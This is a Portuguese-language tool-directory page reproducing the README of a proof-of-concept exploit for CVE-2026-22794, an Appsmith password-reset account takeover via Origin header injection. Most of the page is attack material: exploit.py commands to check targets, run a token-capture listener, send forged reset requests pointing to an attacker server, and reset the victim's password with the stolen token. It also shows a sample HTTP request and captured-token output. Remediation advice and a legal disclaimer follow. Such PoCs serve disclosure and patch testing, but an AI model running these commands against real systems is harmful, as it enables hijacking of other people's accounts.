Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 - Appsmith Redefinição de Senha com Assunção de Conta via Injeção de Cabeçalho Origin | PoC Exploit + Template Nuclei | Kitploit
Ferramentas/GitHubGitHub/malikhamza7/cve-2026-22794-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticação
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - Appsmith Redefinição de Senha com Assunção de Conta via Injeção de Cabeçalho Origin | PoC Exploit + Template Nuclei

Ver RepositórioSite
7há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22794 - Injeção de Cabeçalho Origin no Appsmith

Python Version CVE License

🔴 Vulnerabilidade de Segurança Crítica

Sequestro de Link de Redefinição de Senha via Manipulação do Cabeçalho Origin

Este repositório contém uma Prova de Conceito (PoC) de exploração para CVE-2026-22794, uma vulnerabilidade crítica no Appsmith que permite que atacantes sequestrem tokens de redefinição de senha e obtenham controle total da conta.

📋 Resumo da Vulnerabilidade

CampoValor
ID CVECVE-2026-22794
Software AfetadoAppsmith (versões anteriores ao patch)
Tipo de VulnerabilidadeInjeção de Cabeçalho Origin
ImpactoControle Total da Conta
Pontuação CVSS9.1 (Crítico)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária (vítima clica no link)

🎯 Descrição da Vulnerabilidade

O Appsmith usa o cabeçalho HTTP Origin sem validação para construir URLs de redefinição de senha e verificação de e-mail. O código vulnerável atribui diretamente o cabeçalho Origin à URL base de redefinição de senha:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

Isso permite que um atacante:

  1. Dispare uma redefinição de senha para qualquer endereço de e-mail
  2. Injete um cabeçalho Origin malicioso apontando para um servidor controlado pelo atacante
  3. Capture o token de redefinição de senha quando a vítima clicar no link
  4. Use o token para redefinir a senha da vítima e assumir o controle da conta

🔥 Cadeia de Ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     FLUXO DO ATAQUE                              │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ATACANTE │                    │ APPSMITH │                    │  VÍTIMA  │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Envia e-mail com           │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. Vítima clica no link       │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Token capturado!           │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. CONTROLE DA CONTA! ✓       │                               │
       │                               │                               │

📦 Instalação

root@kitploit:~
# Clonar o repositório
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Instalar dependências
pip install -r requirements.txt

🚀 Uso

Verificar se o alvo é vulnerável

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

Iniciar servidor de captura de token

root@kitploit:~
python exploit.py --listen --port 8080

Enviar solicitação maliciosa de redefinição de senha

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

Ataque automatizado completo

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

Usar token capturado para redefinir senha

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 Demonstração do Ataque

Etapa 1: Atacante envia solicitação maliciosa

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

Etapa 2: Vítima recebe e-mail com link malicioso

root@kitploit:~
Link de Redefinição de Senha: https://attacker-server.com/user/resetPassword?token=abc123xyz...

Etapa 3: Atacante captura o token

root@kitploit:~
[+] SOLICITAÇÃO RECEBIDA CAPTURADA!
[*] Caminho: /user/resetPassword?token=abc123xyz789...
[!!!] TOKEN DE REDEFINIÇÃO DE SENHA CAPTURADO!
[!!!] Token: abc123xyz789...

Etapa 4: Controle da conta

root@kitploit:~
[+] CONTROLE DA CONTA BEM-SUCEDIDO!
[+] A senha foi redefinida para: NewP@ssw0rd!

🛡️ Correção

Organizações que usam o Appsmith devem:

  1. Atualizar imediatamente para a versão corrigida mais recente
  2. Validar cabeçalhos Origin contra uma lista de permissões de domínios autorizados
  3. Usar configuração no lado do servidor para gerar URLs de redefinição de senha
  4. Implementar verificação adicional (ex.: validação de IP, expiração curta de token)

Exemplo de Código Seguro

root@kitploit:~
// ❌ CÓDIGO VULNERÁVEL
userPasswordDTO.setBaseUrl(originHeader);

// ✅ CÓDIGO SEGURO
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Ou validar contra lista de permissões
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Cabeçalho origin inválido");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 Estrutura do Repositório

root@kitploit:~
CVE-2026-22794/
├── README.md           # Este arquivo
├── exploit.py          # Script principal de exploração
├── requirements.txt    # Dependências Python
├── LICENSE             # Licença MIT
└── docs/
    └── technical_analysis.md  # Análise técnica detalhada da vulnerabilidade

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais.

  • Use esta ferramenta somente contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • Acesso não autorizado a sistemas de computador é ilegal
  • O autor não é responsável por qualquer uso indevido desta ferramenta
  • Sempre siga práticas de divulgação responsável

📄 Referências

  • CVE-2026-22794
  • OWASP - Folha de Dicas de Senha Esquecida
  • CWE-346: Erro de Validação de Origin

👤 Autor

Pesquisador de Segurança

  • GitHub: @MalikHamza7
  • LinkedIn: Seu Perfil no LinkedIn

📜 Licença

Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.


⭐ Se você achou isso útil, por favor, dê uma estrela no repositório! ⭐

Baixar ferramenta